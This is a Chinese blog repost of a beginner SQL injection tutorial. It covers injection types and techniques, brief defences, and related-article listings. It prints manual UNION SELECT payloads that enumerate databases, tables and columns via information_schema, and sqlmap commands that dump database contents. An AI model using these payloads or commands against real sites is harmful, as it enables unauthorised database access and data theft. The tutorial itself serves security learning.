web漏洞-sql注入

最新推荐文章于 2024-07-26 14:20:58 发布
最新推荐文章于 2024-07-26 14:20:58 发布
阅读量105 收藏
点赞数
文章标签: 数据库 python
原文链接:http://blog.51cto.com/865516915/2422605
版权

什么是sql
结构化查询语言(Structured Query Language),是一种特殊目的的编程语言,是一种数据库查询和程序设计语言,用于存取数据以及查询、更新和管理关系数据库系统;
如何去发现sql注入
a 通过web漏洞扫描器
b在参数后面添加错误语句
c大量的对参数fuzz测试
d直觉
注入分类
数字型注入 SELECT FROM users WHERE id=$id LIMIT 0,1;
字符型注入 SELECT FROM users WHERE username=‘admin' LIMIT 0,1;
注入提交方式 get post cookie http头部注入

注入方式
基于报错注入
基于布尔的盲注
基于时间的盲注
联合查询
内联查询
堆叠的查询

SQL手工注入
为什么要学习手工注入?
1.猜解字段
2.查看当前数据库
3.Union select 1,group_concat(schema_name),3 from information_schema.schemata%23 // 查询所有数据库
4.union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=0x7365637572697479%23 //查询数据库中的表
5.UNION SELECT 1,GROUP_CONCAT(column_name),3 FROM information_schema.columns WHERE table_name = 0x7573657273%23 //查询表名中的所有字段

SQLMap工具使用
使用环境: python
http://sqlmap.org

sqlmap常用参数

  1. 判断注入
    python sqlmap.py http://URL -v 3
  2. 数据库
    python sqlmap.py http://URL --dbs -v 3
    python sqlmap.py http://URL –current-user -v 3
  3. 表名
    python sqlmap.py http://URL --tables -D 数据库名 -v 3
  4. 字段名
    python sqlmap.py http://URL --column -T 表名 -D 数据库名 -v 3
  5. 内容
    python sqlmap.py http://URL --dump -T -C 字段名 -T 表名 -D 数据库名 -v 3

post如何使用sqlmap注入

如何去防护SQL注入?
cdn隐藏真实ip地址
通过安全函数进行过滤
对数据库最小权限设置
服务器针对性的waf防火墙

bozhubing0375
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
第14天:WEB漏洞-SQL注入之类型及提交注入1
08-03
在网络安全领域,SQL注入是一种常见的Web漏洞,攻击者通过向应用程序的输入字段中插入恶意的SQL代码,以篡改或获取数据库中的敏感信息。本文将详细介绍SQL注入的类型及其提交方式,以及如何进行安全测试。 首先,...
第18天:WEB漏洞-SQL注入之堆叠及WAF绕过注入1
08-03
SQL注入攻击中,我们需要了解数据库的特性,如 MySQLSQL Server、Oracle 等数据库管理系统的注释符、空白符、特殊符号等。例如,在 MySQL 中,注释符有三种:#、/*...*/、-- ;空格符有多种,如[0x09,0x0a-0x0d...
任意文件绕过上传漏洞验证、SQL注入攻击漏洞验证、XSS跨站脚本攻击漏洞验证...
auitas7986的博客
07-16 441
漏洞:任意文件绕过上传漏洞验证。 漏洞危害: 黑客可以上传脚本木马控制网站。 解决方案:白名单过滤文件后缀,并去除上传目录的脚本和执行权限。 解决方法:iis网站->Upload文件夹->处理程序映射(双击)->编辑功能权限->脚本取消勾选。 漏洞: SQL注入攻击漏洞验证。 漏洞危害: 黑客利用精心组织的SQL语...
常见的Web漏洞——命令注入
热门推荐
江左盟的博客
09-29 1万+
目录 命令注入简介 命令注入原理 漏洞利用 漏洞防范 总结 命令注入简介 命令注入漏洞SQL注入、XSS漏洞很相似,也是由于开发人员考虑不周造成的,在使用web应用程序执行系统命令的时候对用户输入的字符未进行过滤或过滤不严格导致的,常发生在具有执行系统命令的web应用中,如内容管理系统(CMS)等。 命令注入原理 本文以DVWA中的Command Injection为例,查看...
网站安全漏洞测试之CMS上传与sql注入攻击
网站安全专家
06-03 1187
近日,我们SINE安全在对某客户的网站进行网站漏洞检测与修复发现该网站存在严重的sql注入漏洞以及上传webshell网站木马文件漏洞,该网站使用的是某CMS系统,采用PHP语言开发,mysql数据库的架构,该网站源码目前是开源的状态。 某CMS是专注于提供付费知识的社交CMS系统,知识付费在目前的互联网中有这很高的需求,该系统可以对文档进行分享,收费下载,用户发布的知识内容可以隐藏,提供给...
SQL注入与木马上传
zgqtxwd的专栏
04-26 1154
<!--google_ad_client = "pub-2947489232296736";/* 728x15, 创建于 08-4-23MSDN */google_ad_slot = "3624277373";google_ad_width = 728;google_ad_height = 15;//--><script type="text/javascript"
web漏洞-SQL注入漏洞、目录遍历漏洞、文件下载漏洞
ran的博客
01-10 1252
在owasp发布的top10排行榜里,注入漏洞一直是危害排名第一的漏洞,其中注入漏洞里面首当其冲的就是数据库注入漏洞。一个严重的SQL注入漏洞,可能会直接导致一家公司破产!SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。从而导致数据库受损(被脱裤、被删除、甚至整个服务器权限沦陷)。
web十大漏洞--sql注入
m0_71907084的博客
10-30 1502
例如:以上就是今天要讲的内容,本文仅仅简单介绍了pandas的使用,而pandas提供了大量能使我们快速便捷地处理数据的函数和方法。
Web的基本漏洞--SQL注入漏洞
尽欢的博客
05-31 3543
SQL注入介绍
网安学习Day14(web漏洞-SQL注入类型及提交注入)
m0_57485346的博客
11-26 3038
网安学习Day14(web漏洞-SQL注入类型及提交注入)
web安全——sql注入漏洞详解
weixin_61967363的博客
03-16 1414
sql注入漏洞知识讲解到检查流程总结
web安全漏洞-SQL注入攻击实验
m0_63645854的博客
09-13 1419
本文主要介绍了sql显注的漏洞判断原理,sqlmap工具的使用以及分析SQL注入漏洞的成因
第16天:WEB漏洞-SQL注入之查询方式及报错盲注1
08-03
SQL注入】是一种常见的网络安全漏洞,发生在Web应用程序中,攻击者通过输入恶意的SQL语句来控制或篡改数据库。本话题主要关注的是在没有直接回显的情况下如何进行SQL注入,特别是通过查询方式和报错盲注技术。 **...
第17天:WEB漏洞-SQL注入之二次,加解密,DNS等注入1
08-03
在网络安全领域,Web漏洞是常见的安全威胁之一,SQL注入是一种尤为危险的攻击方式。本文将深入探讨二次注入、加解密技术以及DNSlog注入的概念、原理,并通过具体案例和实际应用来阐述这些技术如何被利用。 **SQL...
WEB漏洞学习-sql注入
06-11
之前文章中的导图文件,由于个人的在线时间导致大家获取困难,现在放在这里供大家自行取用。
Apollo使用(3):分布式docker部署
游王子的博客
07-24 608
Apollo 1.7.0版本开始会默认上传Docker镜像到,可以按照如下步骤获取。
数据库查询与操作指南-以Nebula图数据库为例
DZSpace,专注于计算机科学与技术领域的技术博主,致力于分享实用知识与技巧,帮助读者快速掌握技术要点,共同探索计算机世界的无限可能。欢迎访问DZSpace的博客,一起学习进步!
07-26 289
数据库查询与操作指南-以Nebula图数据库为例
ODBC连接达梦数据库
qq_55187735的博客
07-24 258
用户执行,因为环境变量配置在。
SQL基础入门:解锁数据库管理的钥匙
最新发布
WayneYalejk的博客
07-26 356
在数字化时代,数据已成为企业最宝贵的资产之一。为了高效地存储、查询和管理这些数据,SQL(Structured Query Language,结构化查询语言)应运而生。SQL不仅是数据库管理员的必备技能,也是数据分析师、开发人员等多个领域从业者的重要工具。本文将带您踏入SQL的世界,从基础概念到实际应用,一步步解锁数据库管理的钥匙。强调SQL在数据处理和分析中的重要性,鼓励读者通过实践不断深化对SQL的理解和应用。
什么是SQL注入漏洞-SQLmap注入
05-21
SQL注入漏洞是一种常见的Web应用程序安全漏洞,攻击者通过在输入数据中插入恶意的SQL代码,使应用程序接受并执行其代码,从而获得不应该被揭示的敏感信息。SQLmap是一种流行的自动化工具,用于检测和利用Web应用程序...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值